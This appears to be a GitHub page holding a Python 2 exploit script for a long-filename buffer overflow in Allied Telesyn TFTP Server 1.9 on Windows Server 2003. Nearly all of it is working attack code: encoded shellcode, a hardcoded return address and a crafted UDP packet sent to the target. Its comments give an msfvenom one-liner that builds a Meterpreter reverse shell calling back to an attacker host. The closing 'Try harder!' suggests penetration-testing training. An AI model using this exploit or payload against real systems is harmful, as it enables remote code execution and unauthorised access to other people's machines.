-
Notifications
You must be signed in to change notification settings - Fork 20
/
atftp_19.py
49 lines (42 loc) · 2.47 KB
/
atftp_19.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# Exploit for Allied Telesyn TFTP Server Long Filename Overflow for Windows Server 2003
# Based on Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)
# Reference: https://www.exploit-db.com/exploits/16350/
# By TIMLAB/ (timip.net)
# Usage: python atftp_19.py <Local IP> <Target IP> <Target Port>"
import sys, socket
# Please replace it with your shellcode!!!!!!
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.134 LPORT=4444 -f raw -o exploit_payload
# echo -en "\x81\xec\xac\x0d\x00\x00" > stack_adjustment
# cat stack_adjustment exploit_payload > adjusted_shellcode
# cat adjusted_shellcode | msfvenom -p - -b "\x00" -a x86 --platform Windows -f python
#
# One-liner:
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.X.X.X LPORT=4444 -f raw -o exploit_payload; echo -en "\x81\xec\xac\x0d\x00\x00" > stack_adjustment; cat stack_adjustment exploit_payload > adjusted_shellcode; cat adjusted_shellcode | msfvenom -p - -b "\x00" -a x86 --platform Windows -f python
# Recommendation: Due to unstable AT-TFTP, please migrate meterpreter to another application after session open.
# i.e.: set AUTORUNSCRIPT post/windows/manage/migrate
buf = ""
buf += "\xbd\x1b\xa2\xb0\x44\xda\xd6\xd9\x74\x24\xf4\x5f\x31"
buf += "\xc9\xb1\x2e\x83\xc7\x04\x31\x6f\x11\x03\x6f\x11\xe2"
buf += "\xee\x23\x5c\xe8\x1d\x24\x9d\x0d\x77\xcf\xda\x05\x7e"
buf += "\xf0\x1a\x2a\xe0\x3e\x3e\x5e\x9d\x7c\x4b\x1d\x60\x05"
buf += "\x4a\x31\x11\xa2\x6c\xcc\xcf\xc6\x59\x54\x0e\x37\x90"
buf += "\xa8\x89\x6b\x12\xe2\xa4\x72\x57\x77\x76\x01\xa1\x3b"
buf += "\x10\xd3\x87\xc9\x3f\x68\x93\x7d\x9b\x6e\x4a\xe7\x68"
buf += "\x6c\xd5\x63\x21\x91\xe4\x9a\xbe\x85\x7f\xd5\xac\xf1"
buf += "\x63\x87\xd3\x1a\xaa\x9c\x4f\x50\x8e\x12\x04\x26\x1d"
buf += "\xd8\x6a\xbb\xb0\x55\xe2\xcb\x94\x0f\xa1\xad\x40\xe3"
buf += "\x77\x5a\xe6\x70\x45\xc5\x5c\x11\x10\x8b\x3c\x22\xb4"
buf += "\xf9\xee\x8f\x6b\x51\x52\x63\xc8\x06\xdd\x64\xa8\x29"
buf += "\x32\x62\x36\x7d\x9e\x15\x8f\x66\xff\x25\x39\x0e\xb9"
buf += "\x72\xaa\x30\x6f\x15\x5c\xc5\x9b\x1a\x1a\xbf\xf3\x0b"
buf += "\x7e\x26\x57\xa5\x9d\xcc\x47\xe6\x36\x77\xd1\x5f\xbd"
buf += "\x88\xf7\x30\x09\x7a\xa8\xe3\x26\xd0\x2e\xbd\x08\xee"
buf += "\x51\x5b"
lhost = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
ret = "\xd3\xfe\x86\x7c"
exploit = "\x00\x02" + "\x90" * (25 - len(lhost)) + buf + ret + "\x83\xc4\x28\xc3\x00netascii\x00"
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(exploit, (host, port))
print 'Done! Try harder!'